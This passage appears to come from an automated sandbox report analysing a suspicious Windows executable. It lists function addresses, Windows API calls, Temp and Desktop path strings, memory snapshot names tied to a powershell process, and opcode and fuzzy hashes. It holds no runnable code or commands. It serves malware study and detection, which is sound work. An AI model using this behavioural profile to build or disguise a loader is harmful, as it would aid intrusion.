                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                • String ID: C:\Users\user\Desktop
                                                                • API String ID: 3449924974-1876063424
                                                                • Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                • Instruction ID: fd95e7d74cf6809d4f8eb1fd1b0c41c525f08b7aa6685e2bd119da418b5cf1ce
                                                                • Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                • Instruction Fuzzy Hash: 61011A72D00219DADF009FA0CD447EFBBB4EF14305F00803AD944B6280DB789658CFA9
                                                                Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                • String ID:
                                                                • API String ID: 1849352358-0
                                                                • Opcode ID: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
                                                                • Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
                                                                • Opcode Fuzzy Hash: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
                                                                • Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78
                                                                Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$Timeout
                                                                • String ID: !
                                                                • API String ID: 1777923405-2657877971
                                                                • Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                • Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
                                                                • Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
                                                                • Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28
                                                                Function 00405B59 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 00405B5F
                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403346,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035A3,?,00000006,00000008,0000000A), ref: 00405B69
                                                                • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B7B
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B59
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CharPrevlstrcatlstrlen
                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                • API String ID: 2659869361-4083868402
                                                                • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                • Instruction ID: 08a0f08e2fd7ff087bee52c9af407669d9ccaaad5643cecad56c46479ba8d62d
                                                                • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                • Instruction Fuzzy Hash: 63D05E31101A24AAC1117B449C04DDF62ACAE85348382007AF541B20A1C77C695186FD
                                                                Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • DestroyWindow.USER32(00000000,00000000,00403059,00000001,?,00000006,00000008,0000000A), ref: 00402E8C
                                                                • GetTickCount.KERNEL32 ref: 00402EAA
                                                                • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402EC7
                                                                • ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402ED5
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                • String ID:
                                                                • API String ID: 2102729457-0
                                                                • Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                • Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
                                                                • Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
                                                                • Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC
                                                                Function 00405260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsWindowVisible.USER32(?), ref: 0040528F
                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004052E0
                                                                  • Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Window$CallMessageProcSendVisible
                                                                • String ID:
                                                                • API String ID: 3748168415-3916222277
                                                                • Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                • Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
                                                                • Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
                                                                • Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69
                                                                Function 004038DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75573420,004038B7,004036CD,00000006,?,00000006,00000008,0000000A), ref: 004038F9
                                                                • GlobalFree.KERNEL32(?), ref: 00403900
                                                                Strings
                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004038F1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: Free$GlobalLibrary
                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                • API String ID: 1100898210-4083868402
                                                                • Opcode ID: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                • Instruction ID: bd2e2babf5735c078d8cab401dc84ea4626969b40d457a48d01b9ed958f4fa52
                                                                • Opcode Fuzzy Hash: c5b968993c0533f4145da43d1685cce5539a5f76f40ddb7aa2d82094c30b15f3
                                                                • Instruction Fuzzy Hash: D6E01D339111305FC6315F55ED0475E77A95F54F22F05457BF8807716047745C925BD8
                                                                Function 00405BA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(00438800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BAB
                                                                • CharPrevW.USER32(00438800,00000000,00438800,C:\Users\user\Desktop,00402F49,C:\Users\user\Desktop,C:\Users\user\Desktop,00438800,00438800,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405BBB
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: CharPrevlstrlen
                                                                • String ID: C:\Users\user\Desktop
                                                                • API String ID: 2709904686-1876063424
                                                                • Opcode ID: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                • Instruction ID: 7007ae8f4af5416befc6157b9dfefed4fe058ad6210d844be01a540b02b626a9
                                                                • Opcode Fuzzy Hash: e4f7a16c0d3aeb27420e4918e5816bacf7b9900a4c75110623d7ea7fd9e9117e
                                                                • Instruction Fuzzy Hash: 2ED05EB3411A209AD3226B04DD04D9F77B8EF51304746446AE840A61A6D7B87D8186AC
                                                                Function 00405CDF Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CEF
                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405D07
                                                                • CharNextA.USER32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D18
                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00405FC4,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D21
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1499256437.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.1499233407.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499276984.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499295942.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1499517645.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_TVPfW4WUdj.jbxd
                                                                Similarity
                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                • String ID:
                                                                • API String ID: 190613189-0
                                                                • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                • Instruction ID: 3a8cc870ad476bca9dd132dfabecf91d91790aae7b943354cd32c9fe52050a58
                                                                • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                • Instruction Fuzzy Hash: 09F0F631204918FFDB029FA4DD0499FBBA8EF16350B2580BAE840F7211D674DE01AB98

                                                                Executed Functions

                                                                Function 07AAC35E Relevance: 1.8, Instructions: 1844COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da7c6d715112a11fa52433b76d554e29423a59dcdeda7790a56da635753b65a7
                                                                • Instruction ID: e3701757c79d425750b8d21a841b72acf98710c8cc0a7d8e04147edb107e910e
                                                                • Opcode Fuzzy Hash: da7c6d715112a11fa52433b76d554e29423a59dcdeda7790a56da635753b65a7
                                                                • Instruction Fuzzy Hash: 1C0341B4A003159FE724DF64C851BAEB7B2EF89304F108499D95A6BB94CB31ED81CF91
                                                                Function 09811CCD Relevance: 2.7, Strings: 2, Instructions: 170COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781160629.0000000009810000.00000040.00000800.00020000.00000000.sdmp, Offset: 09810000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9810000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: T|~$T|~
                                                                • API String ID: 0-1286936172
                                                                • Opcode ID: 888558604a91e15dbe5041a99d511cb42a9585f866dc91ea635058dae7949907
                                                                • Instruction ID: c4470ccf37f00b73eaefc4a66d33b38af056e1648d68ccf56310450b4b79018e
                                                                • Opcode Fuzzy Hash: 888558604a91e15dbe5041a99d511cb42a9585f866dc91ea635058dae7949907
                                                                • Instruction Fuzzy Hash: 6551A035B04214DFCB14CF68C844AAABBA6FF99760B14846DED5ADB341DB31DC42CB91
                                                                Function 07AA20EC Relevance: 1.5, Strings: 1, Instructions: 289COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ]
                                                                • API String ID: 0-3352871620
                                                                • Opcode ID: b636a119e4937209cb6d1506024b39084e281356bee39687878d984ecadc15cf
                                                                • Instruction ID: 92b477a3f519f950347ffc691236da7c6cf969142bc011f628786c9f900b5dbe
                                                                • Opcode Fuzzy Hash: b636a119e4937209cb6d1506024b39084e281356bee39687878d984ecadc15cf
                                                                • Instruction Fuzzy Hash: 23916AF1B04305AFD7259B6898007BAB7A2BFCA215F14807AD9218F7D1DB31CD65C7A2
                                                                Function 07AAD13E Relevance: 1.2, Instructions: 1234COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 42dfe75c352b293706ac765389c3f7e000c3f1f7caad1cb7d02c857ace30f66c
                                                                • Instruction ID: 468c4d069256b4a9f71025e00f61d6ef6cb1a02993caaf4a159f5722ae9856b8
                                                                • Opcode Fuzzy Hash: 42dfe75c352b293706ac765389c3f7e000c3f1f7caad1cb7d02c857ace30f66c
                                                                • Instruction Fuzzy Hash: 99C253B4A003149FE724DF64C851BAEB7B2EF89304F108599D85A6BB94CB35ED81CF91
                                                                Function 07AA7B2A Relevance: .9, Instructions: 891COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2400245256e07755e9c9c748382e41273959dadb906565e55060ef80d2a69a0f
                                                                • Instruction ID: f822f3782f61bcc3f90b589b3cc8c26268168d2abd4b0fe2f24e8da6ce82f514
                                                                • Opcode Fuzzy Hash: 2400245256e07755e9c9c748382e41273959dadb906565e55060ef80d2a69a0f
                                                                • Instruction Fuzzy Hash: 8E824EB4A00315EFD724CF54C950BAAB7B2EB8A304F50C5A9D91A6BB51CB31ED82CF51
                                                                Function 07AA60C8 Relevance: .8, Instructions: 824COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0f7102e5b2349e5a6a2e3cadf2fa0011542f2f756cb336a18ff75db662331a77
                                                                • Instruction ID: e136d79573996b1b631601fa973eee900902284e593ea357873557f753fb149d
                                                                • Opcode Fuzzy Hash: 0f7102e5b2349e5a6a2e3cadf2fa0011542f2f756cb336a18ff75db662331a77
                                                                • Instruction Fuzzy Hash: C2629DB4B11205AFDB14CF58D450BAABBB2EFC9305F18C069E9159B791CB72EC41CBA1
                                                                Function 07AA6F4C Relevance: .7, Instructions: 746COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 6cb0d8ada147e3334562a4b04e1a674685e8057e0f5bdbf6488613c4b09622e8
                                                                • Instruction ID: e859403ef0434c989206bc300d56cecac2610c6f6036e276918196ca9b42467f
                                                                • Opcode Fuzzy Hash: 6cb0d8ada147e3334562a4b04e1a674685e8057e0f5bdbf6488613c4b09622e8
                                                                • Instruction Fuzzy Hash: F4626EB4A00314AFD724DF64C850BAEB7B2EF89304F50C5A9D91A6BB50CB31ED828F51
                                                                Function 09811020 Relevance: .7, Instructions: 691COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781160629.0000000009810000.00000040.00000800.00020000.00000000.sdmp, Offset: 09810000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9810000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e3a6ed7f3e79e42c682a602e33d66373fd8cbf2cf6f0a7f29eb4fd953c471faa
                                                                • Instruction ID: eef2f34e718dd9c896fbdd6ef7077c0f7386dd2d409e4339b9aa915e33310b69
                                                                • Opcode Fuzzy Hash: e3a6ed7f3e79e42c682a602e33d66373fd8cbf2cf6f0a7f29eb4fd953c471faa
                                                                • Instruction Fuzzy Hash: 7432E371B082088FDB14CF68D448AAABBB6EF99315F14C06EEA05DB751DB32DC41CB91
                                                                Function 07AA7CF4 Relevance: .6, Instructions: 649COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 295bc662d432172b6ab9ad7bb9a48d2b4dabb5cc238fd7d17fec4a3ff4e5162d
                                                                • Instruction ID: fa436c26b76e2f3560a5d22aebfb0369bc65642ba182602eb742dc050ad1929b
                                                                • Opcode Fuzzy Hash: 295bc662d432172b6ab9ad7bb9a48d2b4dabb5cc238fd7d17fec4a3ff4e5162d
                                                                • Instruction Fuzzy Hash: ED524CB4A00314EFE724CF14C950BAAB7B2FB86304F50C5A9D91A6BB51CB75ED818F51
                                                                Function 07AAD302 Relevance: .6, Instructions: 624COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
